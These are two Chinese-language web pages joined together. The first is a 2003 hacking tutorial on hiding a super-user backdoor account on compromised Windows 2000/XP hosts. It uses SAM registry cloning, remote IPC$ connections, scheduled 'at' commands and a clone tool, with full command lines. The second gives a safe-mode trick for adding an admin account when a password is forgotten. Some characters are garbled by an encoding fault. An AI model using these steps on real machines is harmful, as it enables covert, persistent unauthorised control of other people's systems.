http://www.foxlog.net/article.php/30 如何在WIN2000/XP中建立隱藏的超級用戶？ 2003-11-01 點擊: 1228 如何在WIN2000/XP中建立隱藏的超級用戶？ 如何在WIN2000/XP中建立隱藏的超級用戶(？) 一、如何在圖形介面建立隱藏的超級用戶 圖形介面下適用本地或開3389終端服務的肉雞上。上面我提到的那位作者說的方法很好，但是較d複雜，還要用到psu.exe(讓程式以系統用戶身份運行的程式），如果在肉雞上的話還要上傳psu.exe。我說的這個方法將不用到psu.exe這個程式。因dwindows2000有兩個註冊表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實d一個程式，修改鍵值的許可權時在右鍵中點“許可權”來修改。對regedit.exe我想大家都很熟悉，但卻不能對註冊表的項鍵設置許可權，而regedt32.exe最大的優點就是能夠對註冊表的項鍵設置許可權。nt/2000/xp的帳戶資訊都在註冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下，但是除了系統用戶SYSTEM外，其他用戶都無權查看到裏面的資訊，因此我首先用regedt32.exe對SAM鍵d我設置d“完全控制”許可權。這樣就可以對SAM鍵內的資訊進行讀寫了了。具體步聚如下： 1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的，首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這裏我在命令行下建立這個帳戶 net user hacker$ 1234 /add 2、在開始/運行中輸入:regedt32.exe並回車來運行regedt32.exe。如圖:t001 3、點“許可權”以後會彈出如下窗口：t002 點添加將我登錄時的帳戶添加到安全欄內，這裏我是以administrator的身份登錄的，所以我就將administrator加入，並設置許可權d“完全控制"。這裏需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組，切莫修改原有的帳戶或組，否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以，再來這裏將你添加的帳戶刪除即可。 4、再點“開始”→“運行”並輸入"regedit.exe" 回車,妍妗虪U表編輯器regedit.exe。 打開鍵：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"如圖：t003 5、將項hacker$、00000409、000001F4導出dhacker.reg、409.reg、1f4.reg，用記事本分別打這幾個導出的文件進行編輯，將超級用戶對應的項000001F4下的鍵"F"的值複製，並覆蓋hacker$對應的項00000409下的鍵"F"的值,然後再將00000409.reg與hacker.reg合併。如圖t004 編輯後的hacker.reg如圖： 6、在命令行下執行net user hacker$ /del將用戶hacker$刪除：net user hacker$ /del 7、在regedit.exe的窗口內按F5刷新，然後打文件-導入註冊表文件將修改好的hacker.reg導入註冊表即可 8、到此，隱藏的超級用戶hacker$已經建好了，然後關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINE\SAM\SAM鍵許可權改回原來的樣子（只要刪除添加的帳戶administrator即可）。 9、注意：隱藏的超級用戶建好後，在帳戶管理器看不到hacker$這個用戶，在命令行用“net user”命令也看不到，但是超級用戶建立以後，就不能再改密碼了，如果用net user命令來改hacker$的密碼的話，那l在帳戶管理器中將又會看這個隱藏的超級用戶了，而且不能刪除。 二、如何在命令行下遠端建立隱藏的超級用戶 在這裏將用at的命令，因d用at{生的計劃任務是以系統身份運行的，所以也用不到psu.exe程式。d了能夠使用at命令，肉雞必須開有schedule的服務，如果沒有開均A可用流光裏帶的工具netsvc.exe或sc.exe來遠端妍吽A當然其方法也可以，只要能妍卲chedule服務就行。 對於命令行方式，你可以採用各種連接方式，如用SQLexec連接MSSQL的1433埠，也可以用telnet服務，只要以你能得到一個cmdshell，並且有運行at命令的許可權就可以。 1、首先找到一台肉雞，至於如何來找那不是我這裏所說的話題。這裏先假設找到一台超級用戶dadministrator,密碼d12345678的肉雞，現在我們開始在命令行下遠端d它建立隱藏的超級用戶。（例子中的主機是我的局域網內的一台主機，我將它的ip位址改d13.50.97.238,，請勿在互聯網上對號入座,以免騷擾正常的ip地址。） 2、先與肉雞建立連接,命令d: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator 3、用at命令在肉雞上建立一個用戶(如果at服務沒有妍吽A可用小榕的netsvc.exe或sc.exe來遠端妍):at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add 建立這個加有$符的用戶名，是因d加有$符後，命令行下用net user將不顯示這個用戶，但在帳戶管理器卻能看到這個用戶。 4、同樣用at命令導出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下鍵值：at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users /e 是regedit.exe的參數，在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\這個鍵的一定要以\結尾。必要的情況下可以用引號將"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起來。 5、將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令d：copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg 修改的方法圖形界中已經介紹過了，這裏就不作介紹了。 6、再將編輯好的hacker.reg拷回肉雞上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg 以上步聚如下圖： 7、查看肉雞時間：net time \\13.50.97.238 然後用at命令將用戶hacker$刪除: at \\13.50.97.238 13:40 net user hacker$ /del 8、驗證hacker$是否刪除:用 net use \\13.50.97.238 /del 斷開與肉雞的連接。 net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞連接，不能連接說明已刪除。 11、再驗證用戶hacker$是否有讀、寫、刪的許可權，如果不放心，你還可驗證是否能建立其他帳戶。 12、通過圖中1、2、3、可以斷定用戶hacker$具有超級用戶許可權，因d最初我用at命令建立它的時候是一個普通用戶，而現在卻具有遠端讀、寫、刪的許可權。 三、如果肉雞沒有開3389終端服務，而我又不想用命令行，怎l辦？ 這種情況下，你也可以用介面方式來遠端d肉雞建立隱藏的超級用戶。因dregedit.exe、regedt32.exe都有連接網路註冊表的功能，你可以用regedt32.exe來d遠端主機的註冊表項設置許可權，用regedit.exe來編輯遠端註冊表。帳戶管理器也有一項連另一台電腦的功能，你可以用帳戶管理器d遠端主機建立和刪除帳戶。具體步聚與上面介紹的相似，我就不多說了，只它的速度實在是令人難以忍受。 但是這裏有兩個前提：1、先用net use \\肉雞ip\ipc$ "密碼" /user:"超級用戶名"來與遠端主機建立連接以後，才能用regedit.exe regedt32.exe及帳戶管理器與遠端主機連接。 2、遠端主機必須開宏滓搧虪U表服務（沒有開妒爾隉A你也可以遠端開均A因d你有超級用戶的密碼了）。 四、利用被禁用的帳戶建立隱藏的超級用戶： 我們可以用肉雞上被禁止的用戶來建立隱藏的超組用戶.方法如下: 1．想辦法查看有哪些用戶被細心的管理員禁止，一般情況下，有些管理員出於安全考慮，通常會將guest禁用，當然了會禁用其他用戶。在圖形介面下，非常容易，只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉；而在命令行下，我還沒有想到好的辦法，只能在命令行下用命令："net user 用戶名"一個一個來查看用戶是否被禁用。 2．在這裏，我們假設用戶hacker被管理員禁用。首先，我先用小榕的超組用戶克隆程式CA.exe，將被禁用的用戶hacker 克隆成超級用戶（克隆之後，被禁用的用戶hacker就會自動被啟動了）: CA.EXE \\肉雞ip administrator 超級用戶密碼 hacher hacher密碼。 3．如果你現在一個cmdshell，如利用telnet服務或SQLEXEC連接肉雞的msSQL的默認埠1433得到的shell都可以，這時你只要輸入命令： net user hacker /active:no 這樣用戶hacker就被禁用了（至少表面上是這樣的），當然你也可以將用戶hacher換成其他的被禁用的用戶。 4．這時如果你在圖形介面下看帳戶管理器中的用戶時,會發現用戶hacker被禁用了，但事實上是這樣的嗎？你用這個被禁用的用戶連接一下肉雞看看是否能連上？用命令：net user \\肉雞ip\ipc$ "hacker密碼" /user:"hacker" 連一連看看。我可以告訴大家，經過我多次試驗，次次都能成功，而且還是超級用戶許可權。 5．如果沒有cmdshell怎l辦？你可以我上面介紹的at命令來禁用用戶hacker;命令格式：at \\肉雞ip 時間 net user hacker /active:no 6．原理：具體的高深的原理我也說不上來，我只能從最簡單的說。你先在圖形介面下在帳戶管理器中禁用一下超級用戶administrator看看，肯定會彈出一對話方塊，並禁止你繼續禁用超級用戶administrator，同樣，因d在克隆時，hacker在註冊表的"F"鍵被超級用戶administrator在註冊表的"F"鍵所替代，因而hacker就具有了超級用戶的許可權了，但是由於hacker在註冊表內"C"健還是原來的"C"鍵，所以hacker還是會被禁用，但是它的超級用戶許可權卻不會被禁用，因此被禁用的用戶hacker還是可以連接肉雞，而且還具有超級用戶的許可權。具體我也說不明白，大家權且這l理解吧。 五、注意的幾點事項： 1、隱藏的超級用戶建立以後，在帳戶管理器中和命令行下均看不到這個用戶，但這個用戶卻存在。 2、隱藏的超級用戶建立以後，就不能再修改密碼了，因d一旦修改密碼，這個隱藏的超級用戶就會暴露在帳戶管理器中，而且不能刪除。 3、如在本機上試驗時，最好用系統自帶的備份工具先備份好本機的“系統狀態”主要是註冊表的備份，因d本人做試驗時，曾出現過帳戶管理器中看不到任何用戶，組中也看不到任何組的現象，但它們卻存在。幸好我有備份,呵呵。SAM鍵是畢竟系統最敏感的部位。 4、本方法在2000/XP上測試通過，未在NT上測試。本方法僅供研究，請勿將本方法用於破壞上，利用本方法造成嚴重後果者，由使用者負責，本人概不負責

http://home.kimo.com.tw/w120967353/Computer/xp_passwoed_1.htm 解決 WindowsXP 忘記用戶登入密碼 【說明】 用戶忘記登入密碼可按下列方法解決 1. 在電腦啟動時按〔F8〕及選〔Safe Mode With Command Prompt〕 2. 選 〔Administrator〕後便會跳出〔Command Prompt〕的窗口 3. 用〔Net〕的命令增加一個用戶，例：增加一個用戶名為 alanhkg888，命令語法如下 net user alanhkg888 /add 4. 將新增用戶提升至 Administrator 的權力，例：提升剛才增加用戶 alanhkg888 的權力，命令語法如下 net localgroup administrators alanhkg888 /add 5. 完成上列步驟後重新啟動電腦，在啟動畫面上便增加了一個用戶 alanhkg888 了，選 alanhkg888 進入 6. 登入後在〔控制台〕→〔使用者帳戶〕→選忘記密碼的用戶，然後選〔移除密碼〕後〔登出〕 7. 在登入畫面中選原來的用戶便可不需密碼情況下等入 (因已移除了) 8. 刪除剛才新增的用戶，在〔控制台〕→〔使用者帳戶〕→選〔alanhkg888〕，然後選〔移除帳戶〕便可 *不適用於忘記安裝時所設定〔administrator〕的密碼